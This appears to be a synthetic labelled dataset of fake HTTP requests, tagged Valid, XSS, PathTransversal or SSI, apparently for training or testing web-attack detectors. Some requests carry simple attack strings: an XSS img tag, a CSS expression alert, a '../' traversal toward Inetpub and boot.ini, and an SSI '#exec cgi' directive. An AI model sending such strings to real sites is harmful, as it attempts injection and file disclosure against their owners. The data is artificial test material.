Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Mon, 19 Nov 07 21:02:54 UTC
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: eiatt@esmwa8oeu.gov
If-Modified-Since: Fri, 11 Jun 04 16:21:33 UTC
If-Unmodified-Since: Tue, 15 Dec 09 15:30:25 UTC
If-Match: *
If-None-Match: "D8mRwUwzvvgq1MsqtQ"
If-Range: *
Max-Forwards: 67
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest qop=v1tssr
Range: 455810-240,-24385
Referer: /ot2otm/sEsh7o/saesU5.php3
TE: gzip;q=0.5
Trailer: Proxy-Authorization
User-Agent: mdfmes (oysgh@zN)
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 133 128.21.84.17 "ewraoseeFm" "Fri, 27 Feb 04 19:29:24 CET"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

F5-Q=t1 unbinnrd$(C4accepttge%to&rqn6o=c9f style=left:expression(alert  (u.liabi))

End - Id: 46933
Start - Id: 21846
class: Valid
GET /ingoesmEsSe/tSNR4CwSuKFiRRH/co5Ep/JobjectA/UtqnahN.mdb? HTTP/1.1
Host: www.rknte.cz
Connection: keep-alive
Accept: text/xml;q=0.1, image/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: ess-igdu;q=0.6, a84ceoes-rtefserr, Kz-nlTz1a, tjsi-1lomw1;q=0.3, dninbe-7ld;q=0.0
Cache-Control: only-if-cached
Client-ip: 155.210.102.61
Cookie: VAlbr3OkC_v=0
Cookie2: $Version="89"
Date: Tue, 27 Jul 04 16:42:41 GMT
ETag: "nKqVikWhRsnFSJJpA18C"
Expect: 100-continue
From: pmreoer@2bi9nc.biz
If-Modified-Since: Mon, 09 Feb 09 15:16:15 CET
If-Unmodified-Since: Sat, 15 Mar 08 20:51:14 GMT
If-Match: "ZwzjQZd0OH4gO74n6"
If-None-Match: *
If-Range: Sun, 17 Apr 05 02:54:14 GMT
Max-Forwards: 5232
MIME-Version: 9.0
Pragma: osby=h
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: NTLM aW5lb2RjQWRyZGpyaDBjOWpEMFhhY2xlSVN1dGlpcXpTc2l0c3Bo
Range: 24-5050
Referer: /ie348ioa/e5uzz/tj8ci/otre3u.mp3
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: xLgmoIllHii
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3901x4660
Via: FTP/9.7 www.ds29.gif, FTP/5.0 31.209.213.130:402
Transfer-Encoding: meam0
Upgrade: rhorei/6.8, eO4/0.9, dtoA/9.0
Warning: 129 www.4dTmhes2.png "Zrp6za" 
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 202474
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21846
Start - Id: 22451
class: Valid
GET /shutdown@y6Oprocessing-instruction/yrsnloeea/esienAoA2tbdifqr.jpeg?enaosi9n=0759&ne6stroh=57&ti0rpswzulE=rq0_SurOn0&Bsihoarsnlr=aossiidytgz&oms=469633018&qe=system&ieoi6yeam3tTDg=68677352&8eh1eeend6st6=gpe&lTses=072126606&3dneIwmhhou=ebrcp%40 HTTP/1.1
Host: www.amrdl.be:80
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 242.133.189.214
Cookie: eqsuee=J3ewgete;wbvI-wopenScmdf@=np;vehusden87d6u=ylraoffem3;ptnnisbem1ujq=ssihhgrdzeH~;lsaso=56852
Cookie2: $Version="31"
Date: Thu, 23 Aug 07 07:23:32 CET
ETag: "xa-zMNeKb3jW4Lg6"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Tue, 08 Dec 09 03:03:05 CET
If-Unmodified-Since: Wed, 09 Feb 05 16:29:41 GMT
If-Match: "FCkl6VzU@y4m8K6N7Eq"
If-None-Match: *
If-Range: Sat, 14 Jun 08 11:10:25 GMT
Max-Forwards: 0
MIME-Version: 6.2
Pragma: r=w
Proxy-Authorization: Basic dGdyZXpHaDpjYmRlNWFpbg==
Authorization: Digest opaque="Daidggoj"
Range: -8,-142035
Referer: http://Hpfe.de/iwGd3/rernRi.html
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: rssd (p_PZa1fJ)
UA-CPU: Sparc
UA-Disp: 8455,3550,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/2.4 81.234.64.42:68, sdsf4/4.6 www.y3gtz.html, eahhsm/0.1 www.eoz32ry.tiff
Transfer-Encoding: compress
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22451
Start - Id: 47520
class: XSS
GET /UhvbscriptS/yfilcknm.jsp?5slaftl=+Ta&.BZPsn=%3Cimg+++src+++%3D+%22+++mocha%3A%5Balert%28%27lemorg%27%29%3B%5D+++%22+++%3E&knpUnrasb=92538037&orhqgoszrh=n%40rme+Nlr1%5D&oiLsa=3secatxp_&69zaapt=33377&Lkxjsiselr=unionew&epnefu7y8lt=tdoy&Z5xtnodegroup by9z=se9&rukeaM0Robt=pWxe2I5_e&9G@.Lexec-GM=73&owvletAsKj=sg%26&iowEvigemhrEda=vet4ldne&9gt6ilrcn=ocpnNNK7Vr&qEemOessOp=tt0n25a2opaec HTTP/1.1
Host: www.hscwp.gov
Connection: keep-alive
Accept: audio/*, image/*, image/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 2.40.61.206
Cookie: N8At=ifa
Cookie2: $Version="7"
Date: Fri, 08 Feb 08 06:43:13 GMT
ETag: "EaAlK23iso.d7ql"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Wed, 20 Jun 07 19:19:15 CET
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: *
If-Range: *
Max-Forwards: 822
MIME-Version: 0.2
Pragma: aeoratsn='udW'
Proxy-Authorization: solli r3h4i=aotni1
Authorization: seu1 ACiLeos=shhiroH
Range: 22-,852303-,3-
Referer: /onwndIn/kahes/exleto.js
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: eS9sephrsowcd2xh7ft8
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 2.7 www.baLuabts.png, 0.3 146.187.249.113, 1.3 81.108.245.245
Transfer-Encoding: ep7gs
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47520
Start - Id: 10531
class: Valid
GET /SRtcpjwwNF2J/yzWv5/vi30k-0wZmYx.cfm?7ah1c=reC&oareE5eSees=9158945277&rfulioysylC=qtwuytoht&n4wnuoe=oa2CTY9N27hp&r5znzodaotpy=bzkfOjCnQbka&tor=313496236&F2odieetest=rwi&rmarsgeP=oLe+&xNe=%29optoe5fy%27w&gsoi02o4i=nq9k&WcscbTd=pxcatuA%3Ftbe5sjee&tj2resseA=bDKKO&no=liketelnetSsiS-%26iet%24xnem&sneeavfgt=sabKQ&execLlpQwinntperl=eh+4i HTTP/1.0
Host: 32.50.33.215:3997
Connection: keep-alive
Accept: image/gif, application/zip;q=0.5
Accept-Charset: windows-1251;q=0.4, x-mac-arabic;q=0.0, koi8-r, x-mac-cyrillic, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: fSel=ehl3
Client-ip: 55.43.222.237
Cookie: Enibs1=5947750441
Cookie2: $Version="6"
Date: Wed, 24 Mar 04 13:25:23 CET
ETag: W/"@A2ZP4Vu5uqc7bEtjn"
Expect: 100-continue
From: oteu@5ieOnnk.biz
If-Modified-Since: Sun, 14 Aug 05 09:09:43 CET
If-Unmodified-Since: Sun, 18 Feb 07 02:27:41 GMT
If-Match: "y53yDuHfUdFXHUY"
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM ZXJlcG5lcWZ3ZW9UeXNhbjNVanl0Z2FucHBpYnNpYWlkZ2puZWJwb2Job1RtZg==
Range: 807-,-8472,-452600
Referer: http://n8dNf.org/Z9HV/evtrsdrT/wn9lafd/eyXatse/p3vuhnoy.jpg
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: oOvHKfl_Q- http://www.ljau.st
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4657x757
Via: HTTP/2.0 www.qhaOnont.htm, HTTP/6.6 39.159.52.48, HTTP/9.3 81.235.87.43
Transfer-Encoding: identity
Upgrade: tl5/3.7, osrmh/0.5, mlszd/1.0, ruai/3.2, hde/0.2
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 911771913047713
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10531
Start - Id: 1173
class: Valid
GET /w3aWWAoiI_..css?goij=lry+et%2B8t&cma5nreDceiaj=dOhffKfL&heuaadA1hbuR=OaWs&u6Nlmfsemiehe=ti%29t HTTP/1.1
Host: 34.159.216.7
Connection: eoeqg
Accept: application/zip;q=0.1, audio/x-wav
Accept-Charset: iso-8859-7, x-mac-greek;q=0.7
Accept-Encoding: identity;q=0.0, identity, compress, deflate, identity;q=0.1
Accept-Language: dLwd-omR, t-ltfdr, wRge-hee3;q=0.9
Cache-Control: only-if-cached
Client-ip: 107.193.233.97
Cookie: bH=68
Cookie2: $Version="99"
Date: Fri, 02 Apr 04 24:04:30 GMT
ETag: "gTFHsmVKl7Dq-Mld"
Expect: 100-continue
From: ix5rl@ooWtfahnnf.gov
If-Modified-Since: Fri, 17 Sep 04 23:14:21 UTC
If-Unmodified-Since: Tue, 09 Nov 04 16:46:03 GMT
If-Match: "dDpUtLeel1VDLQV3ajtx"
If-None-Match: "skVbZ-l9953GtfMdLv"
If-Range: Sun, 25 Apr 10 19:23:05 GMT
Max-Forwards: 0730
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM dDg3bmlmVGxidm5BdDFldm90ZUZhb3RlbHJhRGhpYTlrcXJlV2hkaGUzeW5ldA==
Authorization: Basic bnp0MFRTOmVhdG9oYQ==
Range: -35236,31901-084
Referer: /d5zmh.css
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: tEonFsivsc/5.8.7.0.0
UA-CPU: StrongARM
UA-Disp: 111,7924,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1715x6125
Via: FTP/9.0 162.227.6.15, 5.9 www.J1tout1.html, rne0/1.0 www.ghse.shtml:53159
Transfer-Encoding: compress
Upgrade: eojia/2.5, p3e/1.7
Warning: 664 236.240.179.234 "ldnr" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 83434025
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1173
Start - Id: 15025
class: Valid
GET /oU/u9.tGyP.upH/5EctndN/rAkifXoV1DLnbGREQt/rR5Vf-xy0xfOxGHc2n/yOz.bvR5CJWd_D1/access_logSGZ-xLZmFkEDse.dll? HTTP/1.1
Host: www.xddoGwmh.fr
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: lxt-jDts, ESs-ve;q=0.9, blg7ev-d, r-jTH
Cache-Control: no-transform
Client-ip: 35.69.77.51
Cookie: Efdyddz=31;.PfX=d?;rensstlmcfja=2500
Cookie2: $Version="838"
Date: Sat, 20 Oct 07 11:30:47 CET
ETag: W/".hzPqiXYixjS-SyfCWlj"
Expect: 100-continue
From: hnmh@kie4F.uk
If-Modified-Since: Fri, 29 Jan 10 11:52:54 GMT
If-Unmodified-Since: Wed, 27 Dec 06 16:33:21 UTC
If-Match: "D7_t1TrwlkOJN.9ESU@1"
If-None-Match: "AFwFzGI2.jZnymO"
If-Range: *
Max-Forwards: 06
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: sneehi ac4otb7y=fkida
Authorization: lsY1e uvEmoen=pn7esdtc
Range: 5596-
Referer: /doonGebl.conf
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: dst8 (ivM5Votns4; 7QJQI4eH; t01PfPf3; o0h-uEXxr4; oovG3tq)
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: tIe/7.6 www.irmlr.htm, FTP/3.8 68.139.156.250, HTTP/8.5 www.egeb7.jpeg
Transfer-Encoding: gzip
Upgrade: ieR9s/3.6, iso/3.6
Warning: 742 www.inttce.js "oAn7ShenPaoetctTnl" "Sat, 02 Dec 06 12:45:12 CET"
X-Forwarded-For: 185.54.94.71
X-Serial-Number: 958943826904140
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15025
Start - Id: 25463
class: Valid
GET /abHorol7eekfTe7s.mdb?hrsrslemsescru=ltrtie&ocnwuropxhce=as&sfj=svHJT&dpyn=26159339&geeerEen0=%2BW%28AedrRtp&err=Nmfhtsfn HTTP/1.0
Host: www.EQdtie.ch
Connection: dhocn
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: X7f7w-t, E-oa
Cache-Control: only-if-cached
Client-ip: 16.186.114.94
Cookie: erxWHLa=cr ia8niabgsoundO;taiYr7igm=43;0rnigthi=nbetweenl7ds;iemh3ppr3reN=tbo;thuir25ty1atx=siTistyca jx
Cookie2: $Version="5"
Date: Thu, 10 Apr 08 24:09:36 CET
ETag: W/"LbW7cfqwZiZO5En4hW"
Expect: iela
From: aol8LiS@eneda.cz
If-Modified-Since: Fri, 09 Jun 06 19:51:17 CET
If-Unmodified-Since: Thu, 19 Feb 04 09:46:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Nov 08 17:20:13 CET
Max-Forwards: 3215
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.es3nrdl.de/qeog.pdf
Authorization: NTLM cHJlbk5lbHA5dDgzaVJneWl2cmRreG5ydGVmbmVyZW5qZA==
Range: -7599
Referer: /ylnu/eowsc/iLirnVe/7fee/aacewis.asp
TE: chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/7.9 (compatible; MSIE 2.0; Windows NT; be3edqt; tlI0uife1A)
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 710x415
Via: FTP/2.4 111.243.110.247, 7.2 253.166.56.230, 8.4 www.huaao.htm
Transfer-Encoding: deflate
Upgrade: beumb/2.2, f5l/6.8
Warning: 416 102.2.131.29 "kRtoim" "Sun, 08 Nov 09 07:27:56 CET"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25463
Start - Id: 6568
class: Valid
PUT /nzFttltTnk3Gaoghmf/htuhhnagileds/tms09tfyPemeor/PJ1iframeeSPykB/aG_3YdwJKh4m_WA/s57tSCDXT/dFg-RXb/uewt34w/2WvaEfRIt3andOk2cat/AieieTep0ejttc1MTa/t1nGS1iu--m/rsqUlhrnbm7vsthae.jpg? HTTP/1.0
Content-Length: 105
Content-Language: xoh1H1da,eehiug,lA8od
Content-Encoding: identity
Content-Location: /hwbnutl/onm1cbs/sw2bsomc/Lbsyao.jsp
Content-MD5: dGVwZW1oc3BkdGlpbnRlMw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 04 23:54:18 GMT
Last-Modified: Sat, 31 Oct 09 18:23:11 GMT
Host: 227.159.170.17
Connection: keep-alive
Accept: image/jpeg;q=0.1, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=79
Client-ip: 64.41.220.78
Cookie: 8yefetdheeffotr=44624;edae=bl s;y8ialo1adiuss=6609001909;tdihanmawplhepy=op/ea
Cookie2: $Version="809"
Date: Sat, 02 Jun 07 03:57:30 UTC
ETag: W/".ePF7Ozd0YxQLai7h"
Expect: whte=maaiw
From: r0ll@emEeoe.uk
If-Modified-Since: Sun, 16 Oct 05 15:11:39 UTC
If-Unmodified-Since: Mon, 15 Mar 04 03:41:07 UTC
If-Match: "_.YVDHVI5gtTHiFl5K"
If-None-Match: "p6m7Z7h.UycydJfqRMeN"
If-Range: "Pj7W9RRCWVwkF2LU"
Max-Forwards: 7791
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic T3VlbmNsZjpTcjdjbg==
Range: -45,964658-8
Referer: http://ogEem.ch/etSn6oE/foXam/erudcd.gz
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/1.5 (X11; U; Solaris 5.0; 4o-tv; rv:9.3.4) Gecko/70088754
UA-CPU: StrongARM
UA-Disp: 7851,1243,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2928x871
Via: FTP/0.2 www.otyntot.gif, asaCe/4.1 56.181.189.39:37, FTP/1.9 121.231.212.96:69
Transfer-Encoding: s8oqlE; nrXg55s=Aqcyep
Upgrade: hrs/4.4, 8hti/3.0, anoo/5.2
Warning: 348 218.19.108.198:5 "wtitAgHibhi9pEynzec" 
X-Forwarded-For: 177.82.104.120
X-Serial-Number: 552358
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

0Yuhttpx=inputic&g9vt3ltnhta=98Fumk.&eHxsunwf=759700&9rTeNA8iltaessv=ftao]97&tdfAQe=t1?n[netcatc:

End - Id: 6568
Start - Id: 2046
class: Valid
GET /nsX5yD/7ur3ht/As4T0pcUEanil/nQW9QGkh/syMC2l55rrmgYSPFZ/otqqa-_pSTZ33JK/nen8ho9n/s8@SM4CSYA2pajgfC.exe?eQneaf7d5=3rm&ME=8&qy=162&He1teomiua1=9622&aH=ayclM&elh=031&cnarto8=%2BB+r3f%28Tewp-aj&ktEqits=3eowces5Ohmnuet&.6sfaG@=%27ap&i4YjnsOIrj=aYTF9&fuvjmisu4=5&dohesazhe9dl=pjr&nvttSve1asi0=r9lehnemrg&SoureaIeroEo=heC0boot.ini&7h7n0MqibeoIide=Qeisystemeiatcm HTTP/1.1
Host: www.0llih.net:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.5, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 28.222.181.195
Cookie: 5uwhere6GT=75613897;dN9Dasrre=8228
Cookie2: $Version="423"
Date: Tue, 24 Feb 04 22:02:41 UTC
ETag: "MMjhxV02xzZUJmdm9eYH"
Expect: riad
From: occ0efi@8ll4r48z.be
If-Modified-Since: Thu, 25 Aug 05 15:00:13 GMT
If-Unmodified-Since: Thu, 01 Oct 09 11:29:56 UTC
If-Match: "Fj823QwW35cdj_86VqIb"
If-None-Match: *
If-Range: Fri, 01 Apr 05 07:45:54 GMT
Max-Forwards: 90
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic aDA0ZWV6azptZW50Y3Q=
Range: -586766,7072-,732551-
Referer: http://tpne.it/Wroo0e/yntvxd.tiff
TE: trailers
Trailer: Date
User-Agent: nehnstryel/9.2
UA-CPU: PowerPC
UA-Disp: 5129,6449,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8738x825
Via: 1.7 177.214.75.91, HTTP/2.4 247.192.20.241
Transfer-Encoding: gzip
Upgrade: l0e/3.9, r2qtn/3.5, ewhpe/0.7
Warning: 517 www.ga29eer.tiff "dl7koePensh3m" "Mon, 01 Aug 05 08:22:34 UTC"
X-Forwarded-For: 18.100.221.44
X-Serial-Number: 9493584291760843409
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2046
Start - Id: 14307
class: Valid
GET /st/insert7usrF4/w18pi3anOlrueg/qTda4TA.gif?swinaleag=r3urh8%5Crnat&Yaofri=er%29%25%3Ff6nnhat%3BtI&tsThlArshxfsIH=aAhQunion+raf%7C%288nA&rn=Zc&rdreRaSe=27&xy1c9sZkD=411&siianeTueg=e7JAR_W1i4T&ryqum=a2gemtaozteoc&tedidesamz=sjogGPesIhQU&a7d4ventlti=tpkiO HTTP/1.0
Host: 80.230.241.227:80
Connection: n3vfpcyl
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, windows-1252;q=0.1, windows-1258;q=0.8, macintosh, x-mac-chinesetrad;q=0.4
Accept-Encoding: 
Accept-Language: 4riMh-ihatn4s;q=0.9, orru7-sser
Cache-Control: no-cache
Client-ip: 18.153.158.142
Cookie: iFuoha1bA6a=11088979
Cookie2: $Version="46"
Date: Thu, 05 Nov 09 02:50:24 CET
ETag: W/"ugCM5IiMOMLk_1VuF_"
Expect: 100-continue
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Tue, 06 Oct 09 23:00:01 CET
If-Unmodified-Since: Wed, 27 Apr 05 19:05:58 CET
If-Match: *
If-None-Match: *
If-Range: "VHi6H0O-0yJX_6-"
Max-Forwards: 0
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: 2sEal aoneaoDy=thuf
Authorization: h9t9P li6ostnn=shuijdf
Range: 186-23047,1-,2-48
Referer: /oenrs23/pesoss2/tssa/nmrau/eha4y.php3
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.4 (Windows; U; Win98 5.9; ei-lg; rv:8.6.4) Gecko/32360973
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 314x717
Via: HTTP/3.5 www.0zai.shtml, 5.8 161.78.166.154, 1.7 83.104.99.13
Transfer-Encoding: eaodri
Upgrade: dUtttn/9.4, 1s6f/3.9, oer/8.1
Warning: 537 www.wlxr.htm:0849 "tLslxoacoHtd" "Tue, 21 Mar 06 12:39:39 CET"
X-Forwarded-For: 130.188.8.33
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14307
Start - Id: 45865
class: PathTransversal
GET /thhoeQtiHntdy2uhl4/mMdivWuJzKYB3i/2UEgyXb/r86ba/olAllrtnp0dgreelovtn/sSpilhtsitginAtn/BIs5OHidG-ACvC/iGpCboot.ini2dLn.imgzg/oej3ZhRF0Ow7D@53.shtml?yrrc5ve5rsMC=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fasmech%2Fte%2Finteonen%2Fnellicin.nsf&uhhreP2tgcsci=98061 HTTP/1.0
Host: 147.127.69.77
Connection: k2oyi
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, deflate;q=0.1, deflate;q=0.4, identity;q=0.4
Accept-Language: ut-i, cpue-hhm5eetT;q=0.9, a-i;q=0.1
Cache-Control: no-store
Client-ip: 201.51.1.17
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Fri, 05 Sep 08 06:32:16 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Sun, 19 Jul 09 21:20:33 CET
If-Match: *
If-None-Match: "r2XVw33r8ggBUxgz"
If-Range: "5QXw0MQIv0tVC47.D.4n"
Max-Forwards: 71
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://ifzCn.ch/et7lAnt/edrs/elibu/smdhfsTi/EalsW.php4
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: ecrsnS
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0549x672
Via: 5.8 236.95.231.96
Transfer-Encoding: gzip
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45865
Start - Id: 39178
class: SSI
POST /iqB/uoiX2ioejs/1ad2lmTbU9middssy6j/eQR/dID4wZj54H_9Ajv0x/sfa/eojQg-VxjGDV/Jm6.png? HTTP/1.0
Content-Length: 246
Content-Language: nakoda,ia,yrwer
Content-Encoding: deflate
Content-Location: /rbeh/vdrk5/dfqo/Ace9iic/possu.mpeg
Content-MD5: bUljYWhuMXZzb2VqbGVlMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Thu, 02 Jul 09 18:22:50 UTC
Host: 62.67.23.91
Connection: keep-alive
Accept: image/*;q=0.0, text/html
Accept-Charset: iso-8859-2;q=0.4, iso-8859-4, iso-8859-8;q=0.3, isiri-3342;q=0.6, x-mac-arabic;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: n=uoOTtl
Client-ip: 216.135.181.123
Cookie: mtet=se6a;wnWe4fG2zn4e=elr
Cookie2: $Version="261"
Date: Tue, 07 Apr 09 08:19:13 GMT
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-Match: *
If-None-Match: "XIytUbg@i4Zek9twT_h"
If-Range: Tue, 07 Oct 08 16:35:25 CET
Max-Forwards: 709
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Basic YVRhaXI6cWVoYXQ=
Referer: http://www.ih1trtis.org/oMqeps.gif
TE: trailers,gzip;q=0.0,trailers
Trailer: Pragma
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 7.5; lE-fd; rv:3.8.6) Gecko/93990409
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: d7ra8
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

werq=788117527&TUPxCD0=2718992&rnhDnsastiact2d=5ksaoryozta&XXMxk0Ptswinntm=ne6st leftelnet&dHuw=Thedeisl&k3DmachildgbwSX=766070&3leun=<!-- #exec  cgi="/cgi-bin/script?aiailea"   -->&3winntFyuQsystemx-ULJ=zopenYeypi1ebnehttpsoy

End - Id: 39178
Start - Id: 4767
class: Valid
PUT /tCPVDabXZ.gHmO.X6/paTUspBC/4svpziitteewmeCh/tIn/jeraoLs5oexnfiesayb/pKR/0m/pdhEvalsebchre2se.html? HTTP/1.1
Content-Length: 73
Content-Language: eeotpl,2g39r
Content-Encoding: compress
Content-Location: /Irytsr/aioosE/verhitaS/H0iajc/neqa.exe
Content-MD5: dHJmbzY1d1VoZ3Rpb3VlZg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 24:29:50 UTC
Last-Modified: Thu, 22 Feb 07 01:18:02 UTC
Host: 27.52.177.214
Connection: keep-alive
Accept: video/quicktime, application/x-tar
Accept-Charset: euc-jp;q=0.1, iso-8859-3, x-mac-roman, x-mac-greek, windows-1250
Accept-Encoding: 
Accept-Language: nmsash-aes, sexap-8;q=0.7, O7htn-ur, cqAshy8-nn6e, tiitice-tlehSlht
Cache-Control: 5t='sdsakdir'
Client-ip: 3.205.34.193
Cookie: eesiovnstr7o0h=ots3g
Cookie2: $Version="757"
Date: Tue, 02 Mar 04 10:07:57 UTC
ETag: W/"tc9yl65riZhtGQfcy"
Expect: mijtq5m
From: 1ytNpWte@I5qyi.fr
If-Modified-Since: Thu, 22 Mar 07 08:18:17 CET
If-Unmodified-Since: Tue, 22 Nov 05 15:17:56 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Dec 06 08:46:15 CET
Max-Forwards: 629
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: hpLcsa rrpn3nbs=naldo
Range: -9054
